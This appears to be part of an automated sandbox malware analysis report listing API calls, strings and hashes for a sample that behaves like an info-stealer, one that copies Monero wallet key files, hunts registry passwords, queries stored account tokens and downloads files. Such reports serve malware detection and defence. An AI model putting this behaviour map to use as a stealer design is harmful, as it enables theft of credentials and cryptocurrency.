                        • Opcode ID: 3dabcad6821ddbecc949fbef30d8f77dde8ffb713ec70687776f9c35c503dac6
                        • Instruction ID: aab1e6099fb4dbb93745fd1d8edd98f997e23c4e061efbf0045dcfa18dfb3bd5
                        • Opcode Fuzzy Hash: 3dabcad6821ddbecc949fbef30d8f77dde8ffb713ec70687776f9c35c503dac6
                        • Instruction Fuzzy Hash: 297143B6D00208ABCB14EBA4DC95FEE737DABC9300F044599F605A7181EE75EB45CB91
                        APIs
                          • Part of subcall function 009912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009912B4
                          • Part of subcall function 009912A0: RtlAllocateHeap.NTDLL(00000000), ref: 009912BB
                          • Part of subcall function 009912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009912D7
                          • Part of subcall function 009912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009912F5
                          • Part of subcall function 009912A0: RegCloseKey.ADVAPI32(?), ref: 009912FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0099134F
                        • lstrlen.KERNEL32(?), ref: 0099135C
                        • lstrcat.KERNEL32(?,.keys), ref: 00991377
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009A8B60: GetSystemTime.KERNEL32(009B0E1A,015B9A38,009B05AE,?,?,009913F9,?,0000001A,009B0E1A,00000000,?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009A8B86
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00991465
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009999EC
                          • Part of subcall function 009999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00999A11
                          • Part of subcall function 009999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00999A31
                          • Part of subcall function 009999C0: ReadFile.KERNEL32(000000FF,?,00000000,0099148F,00000000), ref: 00999A5A
                          • Part of subcall function 009999C0: LocalFree.KERNEL32(0099148F), ref: 00999A90
                          • Part of subcall function 009999C0: CloseHandle.KERNEL32(000000FF), ref: 00999A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 009914EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 873fe3e803a3db25caaaededb3fb699281548537ad2e8646780175088e3bb46a
                        • Instruction ID: d5bc193112b594570712b247a526d0baaeb0d13704bfd993e138d2671ab70024
                        • Opcode Fuzzy Hash: 873fe3e803a3db25caaaededb3fb699281548537ad2e8646780175088e3bb46a
                        • Instruction Fuzzy Hash: FB5183B1D101195BCB55FB60DD92BEE733CAF91300F4041A8B60A62092EF346B89CFE6
                        APIs
                          • Part of subcall function 009972D0: memset.MSVCRT ref: 00997314
                          • Part of subcall function 009972D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0099733A
                          • Part of subcall function 009972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009973B1
                          • Part of subcall function 009972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0099740D
                          • Part of subcall function 009972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00997452
                          • Part of subcall function 009972D0: HeapFree.KERNEL32(00000000), ref: 00997459
                        • lstrcat.KERNEL32(00000000,009B17FC), ref: 00997606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00997648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0099765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0099768F
                        • lstrcat.KERNEL32(00000000,009B1804), ref: 009976A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009976D3
                        • lstrcat.KERNEL32(00000000,009B1808), ref: 009976ED
                        • task.LIBCPMTD ref: 009976FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: :
                        • API String ID: 3191641157-3653984579
                        • Opcode ID: 5832bf0432c91b65091ae4f52e17ac6c5adb9ab51a1ecd305cf734cb02a7189a
                        • Instruction ID: a1a00f0cf35d481bdd00942d501a81602a18637f34448f9f71e0d4938e943b53
                        • Opcode Fuzzy Hash: 5832bf0432c91b65091ae4f52e17ac6c5adb9ab51a1ecd305cf734cb02a7189a
                        • Instruction Fuzzy Hash: 89315E71901109DBCF04EBF8DCA9EFFB378BB85701B144519F502A72A0EE34A946DB52
                        APIs
                        • memset.MSVCRT ref: 00997314
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0099733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009973B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0099740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00997452
                        • HeapFree.KERNEL32(00000000), ref: 00997459
                        • task.LIBCPMTD ref: 00997555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuememsettask
                        • String ID: Password
                        • API String ID: 2808661185-3434357891
                        • Opcode ID: 4a6e714cd43575a4922e92dc514d5ca3dbddaca68ec8dc6f0b75cbc2388f2c9b
                        • Instruction ID: c927e0809732af349c041ad2e93c26f67ab517e7aaa6524fd01a73724fd4ff42
                        • Opcode Fuzzy Hash: 4a6e714cd43575a4922e92dc514d5ca3dbddaca68ec8dc6f0b75cbc2388f2c9b
                        • Instruction Fuzzy Hash: 07613BB59141689BDF24DB54CC55BDAB7B8BF88300F0081E9E649A6141EF705FC9CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015BD830,00000000,?,009B0E2C,00000000,?,00000000), ref: 009A8130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A8137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009A8158
                        • __aulldiv.LIBCMT ref: 009A8172
                        • __aulldiv.LIBCMT ref: 009A8180
                        • wsprintfA.USER32 ref: 009A81AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: a51ed4db883af9daf9d4c9103ddf974b1e3bb85e4848e08cd858fcdf995f45ca
                        • Instruction ID: 3532e76ca3e1e34591a25e90ab1630d9cd459dbbd3a3a951ff1d7d005426ef2e
                        • Opcode Fuzzy Hash: a51ed4db883af9daf9d4c9103ddf974b1e3bb85e4848e08cd858fcdf995f45ca
                        • Instruction Fuzzy Hash: 41211AB1E45218ABDB00DFD4CC49FAFBBB8FB45B14F104619F605BB280DB7969018BA5
                        APIs
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                          • Part of subcall function 009947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00994839
                          • Part of subcall function 009947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00994849
                        • InternetOpenA.WININET(009B0DF7,00000001,00000000,00000000,00000000), ref: 0099610F
                        • StrCmpCA.SHLWAPI(?,015BE270), ref: 00996147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0099618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009961B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 009961DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0099620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 00996249
                        • InternetCloseHandle.WININET(?), ref: 00996253
                        • InternetCloseHandle.WININET(00000000), ref: 00996260
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 2b72641dc5485572e887868f13ff93e7e5ec2b6846a3dc657ab86ecedc270bca
                        • Instruction ID: 44c6dbb3cf53c13e9cdb89f073de1f1ab004f31b489b94e9fd9798950f482dad
                        • Opcode Fuzzy Hash: 2b72641dc5485572e887868f13ff93e7e5ec2b6846a3dc657ab86ecedc270bca
                        • Instruction Fuzzy Hash: 225170B1A00218ABDF24DFA4DC55BEEB7B8FB44701F108099B605A71C0EB746E85CFA5
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        • lstrlen.KERNEL32(00000000), ref: 0099BC9F
                          • Part of subcall function 009A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009A8E52
                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0099BCCD
                        • lstrlen.KERNEL32(00000000), ref: 0099BDA5
                        • lstrlen.KERNEL32(00000000), ref: 0099BDB9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                        • API String ID: 3073930149-1079375795
                        • Opcode ID: e78c5db54dc54ed97ea2ae065d3a489b61e18e24f51f6683f98e90e2be670af2
                        • Instruction ID: 3f2c19f422620493999e28527e711f793a31ce2f49d817559290776de3ce6f9b
                        • Opcode Fuzzy Hash: e78c5db54dc54ed97ea2ae065d3a489b61e18e24f51f6683f98e90e2be670af2
                        • Instruction Fuzzy Hash: D4B12C729101089BDF44EBA4DD96FEEB378AF95300F404169F507A6091EF386A49CBE6
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess$DefaultLangUser
                        • String ID: *
                        • API String ID: 1494266314-163128923
                        • Opcode ID: a5a25bb9ff8353b301350f20b2efdcbff16b1b93c11dcb2ce228c50fc24bc7d1
                        • Instruction ID: 298d1543652bd6455dbc3f81b9dfe5fdc567e32fc427c6cfbe750090042d19b3
                        • Opcode Fuzzy Hash: a5a25bb9ff8353b301350f20b2efdcbff16b1b93c11dcb2ce228c50fc24bc7d1
                        • Instruction Fuzzy Hash: AEF05E3091A209EFD3449FE0E92972CBB70FB05703F08019AE60987290EE705F41DBD6
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00994FCA
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00994FD1
                        • InternetOpenA.WININET(009B0DDF,00000000,00000000,00000000,00000000), ref: 00994FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00995011
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00995041
                        • InternetCloseHandle.WININET(?), ref: 009950B9
                        • InternetCloseHandle.WININET(?), ref: 009950C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                        • String ID:
                        • API String ID: 3066467675-0
                        • Opcode ID: 7b512572bf0cf855c44e5e331ce68f5319421a89260ce51c4fda41ca4ab85496
                        • Instruction ID: 72be43af1658a72487ad2b2df23b776be58f075084c755eb42ba33adaa5cf995
                        • Opcode Fuzzy Hash: 7b512572bf0cf855c44e5e331ce68f5319421a89260ce51c4fda41ca4ab85496
                        • Instruction Fuzzy Hash: 2531F2B4A41218ABDB20CF54DC85BDDB7B4EB48704F1081E9FA09A7281DB746EC58F99
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009A8426
                        • wsprintfA.USER32 ref: 009A8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009A847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A8499
                          • Part of subcall function 009AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009AA7E6
                        • RegQueryValueExA.ADVAPI32(00000000,015BD818,00000000,000F003F,?,00000400), ref: 009A84EC
                        • lstrlen.KERNEL32(?), ref: 009A8501
                        • RegQueryValueExA.ADVAPI32(00000000,015BD908,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,009B0B34), ref: 009A8599
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A8608
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: acb899998d724b7a63080e0aa6ea5008dec1a57e4b1341098dccbd744053bee6
                        • Instruction ID: 3c9095623887e1a4c72b962a2cafb17973208b960c3634d870ebc4a82f018fa2
                        • Opcode Fuzzy Hash: acb899998d724b7a63080e0aa6ea5008dec1a57e4b1341098dccbd744053bee6
                        • Instruction Fuzzy Hash: CB2116B1911228ABDB24DB54DC95FE9B3B8FB48700F00C5D9E609A7180DF71AA85CFE4
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A76A4
                        • RtlAllocateHeap.NTDLL(00000000), ref: 009A76AB
                        • RegOpenKeyExA.ADVAPI32(80000002,015AB690,00000000,00020119,00000000), ref: 009A76DD
                        • RegQueryValueExA.ADVAPI32(00000000,015BD890,00000000,00000000,?,000000FF), ref: 009A76FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 009A7708
